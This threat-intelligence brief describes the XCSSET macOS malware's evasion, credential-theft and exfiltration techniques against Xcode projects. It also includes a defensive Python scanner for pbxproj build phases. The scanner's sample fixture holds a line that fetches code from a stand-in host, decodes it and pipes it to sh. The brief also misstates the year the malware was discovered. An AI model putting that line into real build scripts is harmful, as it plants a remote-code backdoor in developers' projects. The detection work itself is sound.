The latest version of the XCSSET malware targets Xcode projects and can evade traditional security methods. Its primary motive is to steal sensitive user data and system information and exfiltrate it to remote servers controlled by threat actors.

Background

XCSSET, a sophisticated malware strain discovered in 2022, has become more dangerous. XCSSET now employs complex obfuscation methods such as code encryption and delayed execution, which prevent the malware from being flagged by static analysis tools or heuristic detection systems. 

By targeting Xcode, a widely used development environment for macOS, the malware aims to compromise not only the individual machines but potentially entire development environments.

Why it Matters

  • Data Exfiltration: The malware’s main goal remains data theft, with XCSSET’s operators using compromised systems to steal valuable files and exfiltrate sensitive information back to remote command-and-control servers.
  • With the enhanced capabilities, XCSSET poses not just a risk to individual developers but also to software supply chains.
  • XCSSET takes advantage of macOS Keychain to steal credentials and sensitive information.
  • Some parts of the XCSSET infection are fileless, which means they don’t leave a traceable file on the system.

Technical Details

  • The malware uses dynamic loading of code during execution, triggering malicious payloads only when needed, thus evading detection during installation or system scans. 
  • XCSSET injects malicious code into legitimate processes like Xcode or macOS system binaries. This makes it harder to detect because the injected code operates within trusted system processes.
  • XCSSET targets Xcode project files (.xcodeproj) and other development-related files, exfiltrating sensitive data and sending it to the attacker’s C2 servers.
  • The malware can also capture sensitive user data, such as macOS system information (hardware specs, installed software), and browsing history.
  • XCSSET can also intercept and manipulate network traffic, allowing it to steal credentials sent over unencrypted connections.
  • The malware frequently uses HTTP or HTTPS over non-standard ports to evade detection by firewalls and IDPS.
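As an added defender-side check (not code from the original brief or from Microsoft's post), the script below scans an Xcode project.pbxproj for Run Script build phases whose shell command shows the behaviours listed above: a remote fetch, decode-and-execute, delayed execution, or a URL on a non-standard port. The indicator list and the sample project fragment are assumptions constructed for this example, not a published XCSSET signature.

```python
import re

# Assumed heuristics for a Run Script build phase that deserves a human look.
INDICATORS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
    "decode_and_run": re.compile(r"base64\s+(-d|-D|--decode)\b|\bxxd\s+-r\b|\beval\b"),
    "delayed_execution": re.compile(r"\bsleep\s+\d+|\bnohup\b"),
}
STANDARD_PORTS = {"80", "443"}
URL_PORT = re.compile(r"https?://[^\s/:'\"]+:(\d+)")
# One object entry of the old-style plist used by project.pbxproj. Assumes the entry
# has no nested braces, which holds for PBXShellScriptBuildPhase objects.
OBJECT = re.compile(r"(?P<id>[0-9A-F]+)\s*(?:/\*.*?\*/)?\s*=\s*\{(?P<body>.*?)\};", re.S)
SCRIPT = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"', re.S)


def _unescape(s):
    # Undo the \n, \t and \" escapes pbxproj applies inside quoted strings.
    return s.replace('\\"', '"').replace("\\n", "\n").replace("\\t", "\t")


def scan_pbxproj(text):
    """Return one finding per shell-script build phase that trips an indicator."""
    findings = []
    for m in OBJECT.finditer(text):
        body = m.group("body")
        if "isa = PBXShellScriptBuildPhase" not in body:
            continue
        sm = SCRIPT.search(body)
        if not sm:
            continue
        script = _unescape(sm.group(1))
        hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
        if any(p not in STANDARD_PORTS for p in URL_PORT.findall(script)):
            hits.append("nonstandard_port")  # C2 over non-standard ports, as noted above
        if hits:
            findings.append({"object": m.group("id"), "indicators": sorted(hits)})
    return findings


# Constructed project.pbxproj fragment: a benign lint step plus a constructed
# suspicious step that fetches, decodes and runs code. Not a real XCSSET sample.
SAMPLE_PBXPROJ = r'''/* Begin PBXShellScriptBuildPhase section */
        A1 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            shellScript = "swiftlint --strict\n";
        };
        B2 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            shellScript = "sleep 60; curl -s http://example.invalid:8443/x | base64 -d | sh &\n";
        };
/* End PBXShellScriptBuildPhase section */'''
```

Run it against every project.pbxproj under a source tree before a build, and treat any finding as a reason to review the commit history of that project file.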

The Bottom Line

XCSSET’s enhanced obfuscation and persistence techniques make it a serious threat to developers using Xcode. Its targeting of sensitive project files also poses risks to the software supply chain.


Source: hxxps[://]www[.]microsoft[.]com/en-us/security/blog/2025/03/11/new-xcsset-malware-adds-new-obfuscation-persistence-techniques-to-infect-xcode-projects/